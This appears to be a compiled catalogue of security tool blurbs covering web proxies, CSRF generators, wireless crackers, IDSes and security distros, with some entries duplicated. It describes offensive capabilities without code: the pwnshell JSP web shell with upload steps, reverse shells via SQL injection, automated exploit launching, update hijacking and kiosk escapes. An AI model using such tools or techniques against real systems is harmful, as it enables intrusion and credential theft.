* Tools to help isolate which test crashed the browser, as well as locate backtrace information


mitmproxy is an SSL-capable, intercepting HTTP proxy. It provides a console interface that allows traffic flows to be inspected and edited on the fly.

mitmdump is the command-line version of mitmproxy, with the same functionality but without the frills. Think tcpdump for HTTP.

* Intercept and modify HTTP traffic on the fly
* Save HTTP conversations for later replay and analysis
* Replay both HTTP clients and servers
* Make scripted changes to HTTP traffic using Python
* SSL interception certs generated on the fly


MonkeyFist is a tool that creates dynamic request forgeries based on cross-domain data leakage. The tool then constructs a payload based on data in the payloads.xml file and sends it to the user’s browser. This may include session data bypassing protection mechanisms for Cross-Site Request Forgery.


Pinata is a Python Script that will generate Proof of Concept CSRF HTML from HTTP request.

Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF (sea-surf) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Pinata is a Python Script that will generate Proof of Concept CSRF HTML from HTTP request.

– The tool will generate proof of concept CSRF HTML given an HTTP request. It will automatically check whether it is a GET or a POST request and with further validation for standard POST and Multipart/form POST.
– The tool will then create an HTML corresponding to the type of the request.
– The GET CSRF HTML includes IMG tag with SRC set to the URL being tested.
– The POST CSRF HTML is created with auto submit java script form with names and values from the HTTP request.


w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.


WATOBO is intended to enable security professionals to perform highly efficient (semi-automated ) web application security audits. We are convinced that the semi-automated approach is the best way to perform an accurate audit and to identify most of the vulnerabilities.

WATOBO has no attack capabilities and is provided for legal vulnerability audit purposes only

WATOBO works like a local proxy, similar to Webscarab, Paros or BurpSuite.

Additionally, WATOBO supports passive and active checks. Passive checks are more like filter functions. They are used to collect useful information, e.g. email or IP addresses. Passive checks will be performed during normal browsing activities. No additional requests are sent to the (web) application.

Active checks instead will produce a high number of requests (depending on the check module) because they do the automatic part of vulnerability identification, e.g. during a scan.


WATOBO is intended to enable security professionals to perform highly efficient (semi-automated ) web application security audits. We are convinced that the semi-automated approach is the best way to perform an accurate audit and to identify most of the vulnerabilities.

WATOBO has no attack capabilities and is provided for legal vulnerability audit purposes only.

WATOBO works like a local proxy, similar to Webscarab, Paros or BurpSuite.

Additionally, WATOBO supports passive and active checks. Passive checks are more like filter functions. They are used to collect useful information, e.g. email or IP addresses. Passive checks will be performed during normal browsing activities. No additional requests are sent to the (web) application.

Active checks instead will produce a high number of requests (depending on the check module) because they do the automatic part of vulnerability identification, e.g. during a scan.


WebInject is a free tool for automated testing of web applications and web services. It can be used to test individual system components that have HTTP interfaces (JSP, ASP, CGI, PHP, AJAX, Servlets, HTML Forms, XML/SOAP Web Services, REST, etc), and can be used as a test harness to create a suite of [HTTP level] automated functional, acceptance, and regression tests. A test harness allows you to run many test cases and collect/report your results. WebInject offers real-time results display and may also be used for monitoring system response times.

WebInject can be used as a complete test framework that is controlled by the WebInject User Interface (GUI). Optionally, it can be used as a standalone test runner (text/console application) which can be integrated and called from other test frameworks or applications.


WebRaider is a plugin based automated web application exploitation tool which focuses to get a shell from multiple targets or injection point.

Idea of this attack is very simple. Getting a reverse shell from an SQL Injection with one request without using an extra channel such as TFTP, FTP to upload the initial payload.

* It’s only one request therefore faster,
* Simple, you don’t need a tool you can do it manually by using your browser or a simple MITM proxy,
* Just copy paste the payload,
* CSRF(able), It’s possible to craft a link and carry out a CSRF attack that will give you a reverse shell,
* It’s not fixed, you can change the payload,
* It’s short, Generally not more than 3.500 characters,
* Doesn’t require any application on the target system like FTP, TFTP or debug.exe,
* Easy to automate.


Internally WebRaider uses Metasploit. The authors use a specific version of Metasploit, they trimmed the fat from Metasploit to launch it faster and make it smaller. You can change the paths and make it work with the latest Metasploit of your own setup.

Also note due to the reverse shells and Metasploit components this software will be detected a virus by AV software


x5s is a Fiddler addon which aims to assist penetration testers in finding cross-site scripting vulnerabilities. It injects ASCII to find traditional encoding issues, and it injects special Unicode characters and encodings to identify where XSS filters might be bypassed. By auto-injecting special character-probes into all inputs x5s can detect where the emitted character may be ill-encoded or transformed in a vulnerable way. The methodology used by x5s is to inject small probes which do not constitute a working XSS payload. In other words, x5s will not inject XSS payloads anywhere, it merely aims to identify character encoding and transformation issues that lead to XSS.

x5s acts as an assistant to the security tester by speeding up the process of parameter manipulation and aggregating the results for quick viewing. It automates some of the preliminary XSS testing work by enumerating and injecting canaries into all input fields/parameters sent to an application and analyzing how those canaries were later emitted. E.g. Was the emitted output encoded safely or not? Did an injected character transform to something else?

x5s does not inject XSS payloads – it does not attempt to exploit or confirm an XSS vulnerability. It’s designed to draw your attention to the fields and parameters which seem likely candidates for vulnerability. A security-tester would review the results to find issues where special characters were dangerously transformed or emitted without a safe encoding. This can be done by quickly scanning the results, which have been designed with the intention of providing quick visual inspection. Results filters are also included so the tester could simply click show hotspots to see only the potential problem areas. After identifying a hotspot it’s the tester’s job to perform further validation and XSS testing.

The types of test cases that x5s includes:

1. Traditional test cases – characters typically used to test for XSS injection such as <, >, « ,and ‘ which are used to control HTML, CSS, or javascript;
2. Transformable test cases – characters that might uppercase, lowercase, Normalize, best-fit map, or other wise transform to completely different characters, E.g. the Turkish ‘İ’ which will lower-case to ‘i’ in culture-aware software.
3. Overlong UTF-8 test cases – non-shortest UTF-8 encodings of the ‘traditional’ test cases noted above. E.g. the ASCII < is 0x3C normally and 0xC0 0xBC in non-shortest form UTF-8.



Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks.


FireShepherd, a small console program that floods the nearby wireless network with packets designed to turn off FireSheep, effectively shutting down nearby FireSheep programs every 0.5 sec or so, making you and the people around you secure from most people using FireSheep.
The program kills the current version of FireSheep running nearby, but the user is still in danger of all other session hijacking mechanisms. Do not do anything over a untrusted network that you cannot share with everyone.
-Know that this is only a temporary solution to the FireSheep problem, created to give people the chance to secure themselves and the others around them from the current threat, while the security vulnerabilities revealed by FireSheep are being fixed.

Optional command line switches:
-i *IP* Ip Destination for packets, local router is recommended. (A trivial facebook server is default)
The local router can be found with the tracert command. (For example the first hit from « tracert &raquo;)
-t *timeout* Timeout in ms for packet sending. About 200 is ok for a local router. (400 is default)
-h Shows this message


universal wireless keyboard sniffer: Keykeriki. This opensource hardware and software project enables every person to verify the security level of their own keyboard transmissions, and/or demonstrate the sniffing attacks (for educational purpose only). The hardware itself is designed to be small and versatile, it can be extended to currently undetected/unknown keyboard traffic, and/or hardware extensions, for example, a repeating module or amplifier


KisMAC wiki! KisMAC is an open-source and free sniffer/scanner application for Mac OS X. It has an advantage over MacStumbler / iStumbler / NetStumbler in that it uses monitor mode and passive scanning.

KisMAC supports several third party PCMCIA cards: Orinoco, PrismII, Cisco Aironet, Atheros and PrismGT. USB devices with Intersil Prism2, Ralink rt2570 and rt73, and Realtek rtl8187 chipsets are in progress towards full support as well. All of the internal AirPort hardware is supported for scanning.


Wi-fEye can be considered as a GUI to almost all tools that we use daily. It is designed to be the ultimate point-and-shoot tool. Wi-fEye will allow you to perform a number of powerful attacks automatically. All you have to do is to launch Wi-fEye, choose which attack to perform, select your target and let Wi-fEye do the magic! So, you see it is designed to help with network penetration testing, reconnaissance, etc.

Wi-fEye is divided to four main menus:

1. Cracking menu: This menu will allow you to:
Enable monitor mode
View available Wireless Networks.
Launch Airodump-ng on a specific AP
WEP cracking: This will allow you to perform the following attacks automatically:
* Interactive packet replay.
* Fake Authentication Attack.
* Korek Chopchop Attack.
* Fragmentation Attack.
* Hirte Attack (cfrag attack).
* Wesside-ng.

WPA Cracking: This contains the following attacks:
* Wordlist Attack
* Rouge AP Attack
2. Mapping: This menu will allow you to do the following:
Scan the network and view the connected hosts
Use Nmap automatically
3. MITM: This menu will allow you to do the following Automatically:
Enable IP forwarding
ARP Spoof
Launch ettercap (Text mode).
Sniff SSL/HTTPS traffic.
Sniff URLs and send them to browser.
Sniff messengers from instant messengers.
Sniff images.
DNS Spoof.
HTTP Session Hijacking (using Hamster).
4. Others: This menu will allow you to do the following automatically:
Change MAC Address.
Hijack software updates (using Evilgrade).

By now, you must have already seen why we said that it is a GUI for different tools. It can be considered as a simple Python wrapper for different tools. The file will help you to integrate the following list of the tools needed for each module:

* Aircrack-ng is needed for all the attacks in the cracking menu
* Nmap is used in Nmap menu.
* Ettercap is very important as it is used in the following attacks:

1. ARP Spoofing.
2. SSL/HTTPS sniffing.
3. URL sniffing.
4. Dns Spoofing.
5. Image sniffing.

* Msgsnarf to sniff instant messenger’s messages.
* Hamster for HTTP session Hijacking
* Expect and Evilgrade for software hijacking.

For example, if you want to hijack software updates in the network, all you have to do is select the software you want to hijack its update, select a payload, select the target and that’s it! Wif-Eye will use Metasploit to create and encrypt the agent, start multi/handler, stop the Apache if it is already running, start the evilgrade webserver and DNS spoof the updates to evilgrade! It’s that simple!


WiPhire is a Bash script aimed at making the Wireless Hacking process a lot easier. This script was written on Backtrack 4 and designed to be used with Backtrack 4. This script was also designed to be used with the Alfa AWUS036H Wireless adapter with the RTL8187 chipset. If you do not have this chipset but another adapter that is compatible with the aircrack-ng suite you will need to put it into monitor mode prior to running the script if you wish to use an option that needs monitor mode enabled. This script needs to be ran as root.

These are the functions of the script:

* autoMACtic MAC spoofer
* Ability to crack WEP networks
* Ability to crack WPA networks
* Perform simple MITM attacks
* DNSspoof a network
* Use airdrop-ng to create a jammer

Programs that WiPhire Uses:

* airmon-ng
* airodump-ng
* aireplay-ng
* aircrack-ng
* airdrop-ng
* xterm
* crunch
* pyrit
* sslstrip
* arpspoof
* macchanger
* kate
* apache2
* ettercap
* Firefox


Consider Grimwepa a front-end to many famous Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA) password auditors. We haven’t been able to use this one as we have been very busy with various assignments. But, still this is worth a mention.

Grimwepa is a password cracker for both WEP and WPA-encrypted access points (routers). It is written in Java and is intended for use with the Linux Operating System, more specifically for the BackTrack distro’s. It has only two modes: Crack WEP-encrypted access points (routers) and crack WPA-encrypted access points. It can search for new targets, and auto-selects your cracking method! Pretty much everything is done for you.


Genuine geeks, whether professional or casual, need Wi-Fi tools that help troubleshoot WLAN networks. With inSSIDer, MetaGeek has created a gift that keeps on giving. Our award-winning, open-source Wi-Fi scanner software, inSSIDer, is an alternative to network scanners like NetStumbler. One big difference: inSSIDer actually works with Windows Vista, Windows 7, and 64-bit PCs.

inSSIDer is FREE, open-source Wi-Fi scanning software. And yet you want to know more. Wow. you truly are our type of geek. Take a look at the features below to see what makes inSSIDer special.
What’s Unique about inSSIDer?

* Compatible with Windows XP, Vista and 7 (32 and 64-bit)
* Uses the Native Wi-Fi API and your current Wireless network card
* Sort results by Mac Address, SSID, Channel, RSSI and « Time Last Seen »
* Compatible with most GPS devices (NMEA v2.3 and higher)

How can inSSIDer help me?

* Inspect your WLAN and surrounding networks to troubleshoot competing access points
* Track the strength of received signal in dBm over time
* Filter access points in an easy-to-use format
* Highlight access points for areas with high Wi-Fi concentration
* Export Wi-Fi and GPS data to a KML file to view in Google Earth.
* Filter through hundreds of scanned access points


This tool automates some of the tasks you might need on a (wireless) penetration test or while you are on the go. It aims to be a multi purpose tool for:

* Connect to different access points with different credentials with easy to use config files
* Run a evil / rogue access point (Karma, Karmetasploit)
* Sniff credentials (dsniff suite, sslstrip)
* Hamster credentials (Wifizoo, Ferret, Hamster)
* Test WEP encryption (Wepbuster)
* Set up secure connections in hostile environments (SSH tunnel, OpenVPN, DNS Tunnel)
* Install and Update required software

Written for the security disto Backtrack, heavily tested on BT4 Final in particular, also running on Ubuntu 9.10, but might work on others systems, too.


BinPack is a portable security environment for Windows. With 100+ security tools in the repository, you can easily convert any system into a hacking platform in minutes.


Honggfuzz is a general-purpose fuzzing tool. Given a starting corpus of test files, Hongfuzz supplies and modifies input to a test program and utilize the ptrace() API/POSIX signal interface to detect and log crashes.

Basically it’s a simple, easy to use via command-line interface, providing nice analysis of software crashes in a simple form of file names.

It has been used to find a few (possibly exploitable) bugs in some major software packages including freetype2, librsvg and libtiff.


* Easy setup: No complicated configuration files or setup necessary — Hongfuzz can be run directly from the command line.
* Fast: Multiple Hongfuzz instances can be run simultaneously for more efficient fuzzing.
* Powerful analysis capabilities: Hongfuzz will use the most powerful process state analysis (e.g. ptrace) interface under a given OS.


iKAT was designed to aid security consultants with the task of auditing the security of a Windows based internet Kiosk terminal. iKAT is designed to provide access to the underlying operating system of a Kiosk terminal by invoking native OS functionality. This tool should be (and is) used by Kiosk vendors/developers/suppliers to test the security of their own Kiosk products.

Designed as a SaaS, iKAT features many methods of escaping out of a browser jailed environment and gaining command execution. iKAT is a website you visit from a Kiosk, its quick, free, and aims to please. iKAT is solely developed by myself (Paul Craig) a Kiosk hacking enthusiast from New Zealand.

Whats New in iKAT v3

Signed Code
All iKAT tools, VBScripts, ActiveXs, ClickOnce, SilverLight apps are now signed by a trusted CA! Four months ago i placed a “Donate Now” button on the front page of iKAT, hoping to raise money for a code signing certificate Sadly only two people donated cash (Enrique Exposito Martinez and Gerald Fehringer, you guys rock) Luckily a Kiosk vendor was willing to come to the party and donate the remaining cash. Big thanks to Kioware Kiosks, who kindly donated the remaining money. All iKAT tools are now signed by a trusted CA.

More Tools
iKAT now contains more tools packaged in different containers, file formats, PDFs, and even silent installers. More Java Applets, More VBScript, More WMI!

iKAT ActiveX
A newly developed ActiveX which focuses on Windows Shell hacking and process spawning. The ActiveX is signed and provides a mad amount of functionality.

iKAT OfficeKAT
Thanks to Didier Stevens who donated his “Excel Spawn CMD in Memory” trick to the iKAT project OfficeKAT allows you to pop shell in environments where you can run Excel, what’s more you don’t need to write to the file system.

iKAT SilverLight
SilverLight (and mono) are now supported by iKAT, and provide yet another attack vector for your pleasure

Improved URI + File Handler Enumeration
Vastly improved enumeration code, more URI’s, more instant “One click magic”. I also added support some of the more interesting Microsoft based URI handler vulnerabilities released this year.

Emo Kiosking – Crashing the Kiosk
The fastest way to get out of a browser jail environment is to simply CRASH IT. Oddly enough this is also the easiest thing to do to a browser, and Emo-Kiosking has become a personal favourite trick of mine. iKAT now supports over 60 different methods of crashing a browser, or a browser add-on This allows you to quickly drop back to the desktop, often with only one click required.

To use iKat just visit the following URL in a kiosk system browser:


PRN-2-me is a simple listener that can be configured to run on any port (default is 9100 for jetdirect style connections). The tool will then save all incoming PCL and PostScript print jobs to file and forward them on to the real printer.


What do you do when you have an arbitrary file upload to a web-accessible directory in J2EE? Obviously, you need a JSP shell! But there’s one problem: the available ones are kind of terrible. The Metasploit reverse shell is only intended to serve as placeholder for an already-owned box. The world needs a JSP shell that really helps a blackbox attacker pivot to important assets, so I took a stab at it. It’s called quite lamely called pwnshell.

What is it?
A single JSP file, embedded with jQuery and everything else you need to make an awesome web shell.

How do you use it?
1. Upload it to the victim server (try it on a local Tomcat server!)
2. Browse to it
3. Pretend you’re on looking at xterm

Where does it work?
– Works across platform
– Works on Java 1.5+ (probably 1.4 too, but I haven’t tested)

Why would you use it?
– Browse around the system (as the web application system user)
– Execute arbitrary system commands (it’s a shell, after all)
– Show and alter session variables
– Dump JNDI entries


Autohack your targets with least possible interaction.

Features :

– Contains already custom-compiled executables of famous and effective exploits alongwith a few original exploits.
– No need to debug, script or compile the source codes.
– Scans all ports 1 – 65535 after taking the IP address and tries all possible exploits according to the list of discovered open ports (OpenPorts.TXT)
– PortScan is multi-threaded.
– Doesn’t require any Database at the back-end like others
– Can be also be used to test effectiveness of IDS/IPS
– Launched exploits are independent and don’t rely on service fingerprinting (to avoid evasion, if any)

The aim of creating winAUTOPWN is not to compete with already existing commercial frameworks like Core Impact (Pro), Immunity Canvas, Metasploit Framework (freeware), etc. which offer autohacks, but to create a free, quick, standalone application which is easy to use and doesn’t require a lot of support of other dependencies.
Also not forgetting that winAUTOPWN unlike other frameworks maintains the original exploit writer’s source code intact just as it was and uses it. This way the exploit writer’s credit and originality is maintained. The source is modified only when required to enable a missing feature or to remove hard-coded limitations. Under these circumstances also, the exploit writer’s credits remain intact.

Newer exploit modules are added as and when they release and older ones are also being daily added.
Binaries of perl, php, python and cygwin DLLs (included) are required to exist either in a common folder or should be properly installed with their paths registered for those exploits which are cannot be compiled into a PE-exe.

Some anti-viruses might falsely detect the exploits as malicious.


Autohack your targets with least possible interaction.

Features :

– Contains already custom-compiled executables of famous and effective exploits alongwith a few original exploits.
– No need to debug, script or compile the source codes.
– Scans all ports 1 – 65535 after taking the IP address and tries all possible exploits according to the list of discovered open ports (OpenPorts.TXT)
– PortScan is multi-threaded.
– Doesn’t require any Database at the back-end like others
– Can be also be used to test effectiveness of IDS/IPS
– Launched exploits are independent and don’t rely on service fingerprinting (to avoid evasion, if any)

The aim of creating winAUTOPWN is not to compete with already existing commercial frameworks like Core Impact (Pro), Immunity Canvas, Metasploit Framework (freeware), etc. which offer autohacks, but to create a free, quick, standalone application which is easy to use and doesn’t require a lot of support of other dependencies.
Also not forgetting that winAUTOPWN unlike other frameworks maintains the original exploit writer’s source code intact just as it was and uses it. This way the exploit writer’s credit and originality is maintained. The source is modified only when required to enable a missing feature or to remove hard-coded limitations. Under these circumstances also, the exploit writer’s credits remain intact.

Newer exploit modules are added as and when they release and older ones are also being daily added.
Binaries of perl, php, python and cygwin DLLs (included) are required to exist either in a common folder or should be properly installed with their paths registered for those exploits which are cannot be compiled into a PE-exe.

Some anti-viruses might falsely detect the exploits as malicious.


Anti Meterpreter

Antimeter is a very useful tool for internal security administrators who can scan their systems for meterpreter session remains after they have successfully exploited any system with Metasploit.


ArpON (Arp handler inspectiON) is a portable handler daemon that make Arp secure in order to avoid Arp Spoofing/Poisoning & co.

This is possible using two kinds of anti Arp Poisoning tecniques, the first is based on SARPI or « Static Arp Inspection », the second on DARPI or « Dynamic Arp Inspection » approach.

Keep in mind other common tools fighting ARP poisoning usually limit their activity only to point out the problem instead of blocking it, ArpON does it using SARPI and DARPI policies. Finally you can use ArpON to pentest some switched/hubbed LAN with/without DHCP protocol, in fact you can disable the daemon in order to use the tools to poison the ARP Cache.

Remember it doesn’t affect the communication efficiency of the ARP protocol!

– It replaces Arpwatch & co; ArpON blocks;
– It detects and blocks Arp Poisoning/Spoofing attacks in statically configured networks;
– It detects and blocks Arp Poisoning/Spoofing attacks in dinamically configured (DHCP) networks;
– It detects and blocks unidirectional and bidirectional attacks;
– It manages the network interface into unplug, boot, hibernation and suspension OS features;
– Easily configurable via command line switches, provided that you have root permissions;
– It works in userspace for OS portability reasons;
– Tested against Ettercap, Cain & Abel, dsniff and other tools.


Astaro Security Gateway

The Essential Firewall edition provides protection for unlimited IP addresses and the following features without any time limitations:
– Networking: Internet Router, Bridging, DNS server & proxy, DynDNS, DHCP server & relay, NTP support, automatic QoS
– Network Security: Stateful Packet Inspection Firewall & Network Address translation (DNAT/SNAT/Masquerading)
– Remote Access: PPTP and L2TP over IPSec support (including iPhone support)
– Logging/Reporting: Full logging on local hard drive, searching, real-time reports for hardware, network usage and network security, daily executive reports
– Management: Web-based GUI in local languages, setup wizard, configuration backup & restore, administrator notifications, SNMP support, centralized management via Astaro Command Center (also free of charge)

Which Platforms are Supported by the Essential Firewall Edition?

The Essential Firewall software is available as a software and virtual appliance. Both versions offer the identical feature set and include a hardened linux operating system.

* The software appliance can be either installed on a dedicated Intel™-compatible PC or within a virtual machine.
* The virtual appliance can be run directly in any VMware vSphere Edition

Running an Astaro Security Gateway within a virtual machine protects your environment twice:

* External communication – Defense against threats from the Internet, e.g. Trojans and viruses
* Inter-VM communication – Controls and monitors data traffic between virtual machines


GreenSQL is an Open Source database firewall used to protect databases from SQL injection attacks. GreenSQL works as a proxy for SQL commands and has built in support for MySQL.



OSSEC is a scalable, multi-platform, open source Host-based Intrusion Detection System (HIDS). It has a powerful correlation and analysis engine, integrating log analysis, file integrity checking, Windows registry monitoring, centralized policy enforcement, rootkit detection, real-time alerting and active response.

Patriot NG

Patriot is a ‘Host IDS’ tool which allows real time monitoring of changes in Windows systems or Network attacks.

Patriot monitors:

* Changes in Registry keys: Indicating whether any sensitive key (autorun, internet explorer settings…) is altered.
* New files in ‘Startup’ directories
* New Users in the System
* New Services installed
* Changes in the hosts file
* New scheduled jobs
* Alteration of the integrity of Internet Explorer: (New BHOs, configuration changes, new toolbars)
* Changes in ARP table (Prevention of MITM attacks)
* Installation of new Drivers
* New Netbios shares
* TCP/IP Defense (New open ports, new connections made by processes, PortScan detection…)
* Files in critical directories (New executables, new DLLs…)
* New hidden windows (cmd.exe / Internet Explorer using OLE objects)
* Netbios connections to the System
* ARP Watch (New hosts in your network)
* NIDS (Detect anomalous network traffic based on editable rules)


The Suricata Engine is an Open Source Next Generation Intrusion Detection and Prevention Engine. This engine is not intended to just replace or emulate the existing tools in the industry, but will bring new ideas and technologies to the field.

OISF is part of and funded by the Department of Homeland Security’s Directorate for Science and Technology HOST program (Homeland Open Security Technology), by the the Navy’s Space and Naval Warfare Systems Command (SPAWAR), as well as through the very generous support of the members of the OISF Consortium. More information about the Consortium is available, as well as a list of our current Consortium Members.

The Suricata Engine and the HTP Library are available to use under the GPLv2.

The HTP Library is an HTTP normalizer and parser written by Ivan Ristic of Mod Security fame for the OISF. This integrates and provides very advanced processing of HTTP streams for Suricata. The HTP library is required by the engine, but may also be used independently in a range of applications and tools.


The Samhain host-based intrusion detection system (HIDS) provides file integrity checking and log file monitoring/analysis, as well as rootkit detection, port monitoring, detection of rogue SUID executables, and hidden processes.

Samhain been designed to monitor multiple hosts with potentially different operating systems, providing centralized logging and maintenance, although it can also be used as standalone application on a single host.

About Beltane

Beltane is a web-based central management console for the Samhain file integrity / intrusion detection system. It enables the administrator to browse client messages, acknowledge them, and update centrally stored file signature databases.

As the Samhain daemon keeps a memory of file changes, the file signature database need only be up to date when the daemon restarts and downloads the database from the central server. Beltane allows you to use the information logged by the client in order to update the signature database.


Snorby is a new and modern Snort IDS front-end. The basic fundamental concepts behind snorby are simplicity and power. The project goal is to create a free, open source and highly competitive application for network monitoring for both private and enterprise use.



PacketFence is a free and open source network access control (NAC) system. PacketFence is actively maintained and has been deployed in numerous large-scale institutions over the past years. It can be used to effectively secure networks – from small to very large heterogeneous networks.


OpenDLP is a free and open source, agent-based, centrally-managed, massively distributable data loss prevention tool released under the GPL. Given appropriate Windows domain credentials, OpenDLP can simultaneously identify sensitive data at rest on hundreds or thousands of Microsoft Windows systems from a centralized web application. OpenDLP has two components: a web application and an agent.

Web Application

* Automatically deploy and start agents over Netbios
* When done, automatically stop, uninstall, and delete agents over Netbios
* Pause, resume, and forcefully uninstall agents in an entire scan or on individual systems
* Concurrently and securely receive results from hundreds or thousands of deployed agents over two-way-trusted SSL connection
* Create Perl-compatible regular expressions (PCREs) for finding sensitive data at rest
* Create reusable profiles for scans that include whitelisting or blacklisting directories and file extensions
* Review findings and identify false positives
* Export results as XML
* Written in Perl with MySQL backend


* Runs on Windows 2000 and later systems
* Written in C with no .NET Framework requirements
* Runs as a Windows Service at low priority so users do not see or feel it
* Resumes automatically upon system reboot with no user interaction
* Securely transmit results to web application at user-defined intervals over two-way-trusted SSL connection
* Uses PCREs to identify sensitive data inside files
* Performs additional checks on potential credit card numbers to reduce false positives


Scannedonly is a samba VFS module and a scanning daemon that ensure that only files that have been scanned for viruses are visible and accessible to the end user.

Scannedonly comes in two parts: a samba vfs module (included in samba since samba-3.5.0) and (one or more) daemons. The daemon scans files. If a certain file is clean, a second file is created with prefix .scanned:. The samba module simply looks if such a .scanned: file exists, and is newer than the pertinent file. If this is the case, the file is shown to the user. If this is not the case, the file is not returned in any directory listing, and cannot be opened. The samba vfs module will also tell the daemon to scan this file.

So what happens for the user. The first time a directory is listed, it is empty, but after a first refresh all files are shown. There is a utility scannedonly_prescan that can help you to prescan all directories.

If a virus is found by the daemon, a file with a warning message is created in the directory of the user, a warning is sent to the logs, and the file is renamed to have prefix .virus:. Files with the .virus: prefix are never shown to the user and all access is denied.



Dradis Framework

Dradis is an open source framework to enable effective information sharing. Dradis is a self-contained web application that provides a centralised repository of information to keep track of what has been done so far, and what is still ahead.



Spiceworks is the complete network management & monitoring, helpdesk, PC inventory & software reporting solution to manage Everything IT in small and medium businesses.

Spiceworks Lets You…

* Inventory Your Network & PCs
* Monitor & Manage Your Network
* Manage Your IT Assets
* Manage Changes & Configurations
* Map Your NetworkBETA
* Audit Your Software
* Troubleshoot Your Network
* Run an IT Help Desk
* Be an MSP
* Talk to IT Pros Like You

Spiceworks IT Desktop is designed for

* IT Pros who have admin rights on their network.
* Organizations with less than 500 devices on their network. It will work with more but it won’t be as fast.
* Running on a PC. It discovers Windows, OS X, Linux and Unix but you need to run it from a PC on your network.


Lansweeper: hardware, network and software inventory for windows networks
Lansweeper is an automated network discovery tool which scans all your computers and devices and displays them in an easy accessible web interface.
There is no need to install any agents on the computers, all scanning is done by standard build-in functionality (wmi, snmp, ssh,…)

OS Distro


Katana Is a portable multi-boot security suite designed for many of your computer security needs. The idea behind this tool is to bring together all of the best security distributions to run from one USB drive. Katana includes distributions which focus on Penetration Testing, Auditing, Password Cracking, Forensics and Honey Pots.


LAMPSecurity training is designed to be a series of vunlerable virtual machine images along with complementary documentation designed to teach linux,apache,php,mysql security.


The Matriux is a phenomenon that was waiting to happen. It is a fully featured security distribution consisting of a bunch of powerful, open source and free tools that can be used for various purposes including, but not limited to, penetration testing, ethical hacking, system and network administration, cyber forensics investigations, security testing, vulnerability analysis, and much more. It is a distribution designed for security enthusiasts and professionals, although it can be used normally as your default desktop system.

Network Security Toolkit

“The Network Security Toolkit (NST) is a bootable ISO live CD/DVD (NST Live) and is based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms. The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open Source Network Security Tools. An advanced Web User Interface (WUI) is provided for system administration, navigation, automation and configuration of many network and security applications found within the NST distribution. In the virtual world, NST can be used as a network security analysis, validation and monitoring tool on enterprise virtual servers hosting virtual machines. NST also makes an excellent tool to help one with crash recovery troubleshooting scenarios and diagnostics.”

OWASP Broken Web Applications Project

Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications that is distributed on a Virtual Machine in VMware format compatible with their no-cost VMware Player and VMware Server products (along with their commercial products).


Qubes implements Security by Isolation approach. To do this, Qubes utilizes virtualization technology, to be able to isolate various programs from each other, and even sandbox many system-level components, like networking or storage subsystem, so that their compromise don’t affect the integrity of the rest of the system.

Qubes lets the user define many security domains implemented as lightweight Virtual Machines (VMs), or “AppVMs”. E.g. user can have “personal”, “work”, “shopping”, “bank”, and “random” AppVMs and can use the applications from within those VMs just like if they were executing on the local machine, but at the same time they are well isolated from each other. Qubes supports secure copy-and-paste and file sharing between the AppVMs, of course.


The Samurai Web Testing Framework is a LiveCD focused on web application testing. We have collected the top testing tools and pre-installed them to build the perfect environment for testing applications.

WeakNet Linux

“A must-have for anyone interested in Security or Forensics, this CD-sized distro contains all the tools you need to test your skills and excel in the field of INFOSEC.” – Johnny Long (

Web Security Dojo

Web Security Dojo
A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo
Various web application security testing tools and vulnerable web applications were added to a clean install of Ubuntu v9.10.
The Web Security Dojo is for learning and practicing web app security testing techniques. It is ideal for training classes and conferences since it does not need a network connection. The Dojo contains everything needed to get started – tools, targets, and documentation.

Convenient virtual machine image
(VirtualBox recommended, VMware provided)
Targets include:

* OWASP’s WebGoat v5.2
* Damn Vulnerable Web App v1.0.6
* Hacme Casino v1.0
* OWASP InsecureWebApp v1.0
* simple training targets by Maven Security (including REST and JSON)


* Burp Suite (free version) v1.3
* w3af cvs version
* OWASP Skavengerv0.6.2a
* OWASP Dirbuster v1.0 RC1
* Paros v3.2.13
* Webscarab v20070504-1631
* Ratproxy v1.57-beta
* sqlmap v0.7
* helpful Firefox add-ons


Kon-Boot is an prototype piece of software which allows to change contents of a linux kernel (and now Windows kernel also!!!) on the fly (while booting). In the current compilation state it allows to log into a linux system as ‘root’ user without typing the correct password or to elevate privileges from current user to root. For Windows systems it allows to enter any password protected profile without any knowledge of the password.



A tool to help developers and security professionals conduct manual security code reviews in a consistent and repeatable way. Agnitio aims to replace the adhoc nature of manual security code review documentation, create an audit trail and reporting.


* Security code reviews
* Security code review metrics and reporting
* Application security code review tool
* Static analysis security guidance and reporting

Buck Security

Buck Security is a collection of security checks for Linux. It was designed for Debian and Ubuntu servers, but can be useful for any Linux system.

The aim of Buck Security is, to allow you to get a quick overview of the security status of your system. As a linux system administrator – but also as a normal linux user – you often wonder if your system is secure. In this situation it is useful to get an overvirew of the security status of the system immediately. Buck Security was designed exactly for this. It runs important tests and returns the results to you after a couple of minutes.

By now the following tests are implemented:

* Searching for worldwriteable files
* Searching for worldwriteable directories
* Searching for programs where the setuid is set
* Searching for programs where the setgid is set
* Checking your umask
* Checking if the sticky-bit is set for /tmp
* Searching for superusers
* Searching for installed attack tools packages

CERT Basic Fuzzing Framework

The Basic Fuzzing Framework (BFF) consists of two main parts:

* a Linux virtual machine that has been optimized for fuzzing
* a set of scripts and a configuration file that orchestrate the fuzzing run

The virtual machine is a stripped-down Debian installation with the following modifications:

* The Fluxbox window manager is used instead of the heavy Gnome or KDE desktop environments.
* Fluxbox is configured to not raise or focus new windows. This can help in situations where you may need to interact with the guest OS while a GUI application is being fuzzed.
* Memory randomization is disabled.
* VMware Tools is installed, which allows the guest OS to share a directory with the host.
* The OS is configured to automatically log in and start X.
* sudo is configured to not prompt for a password.
* strip is symlinked to /bin/true, which prevents symbols from being removed when an application is built.

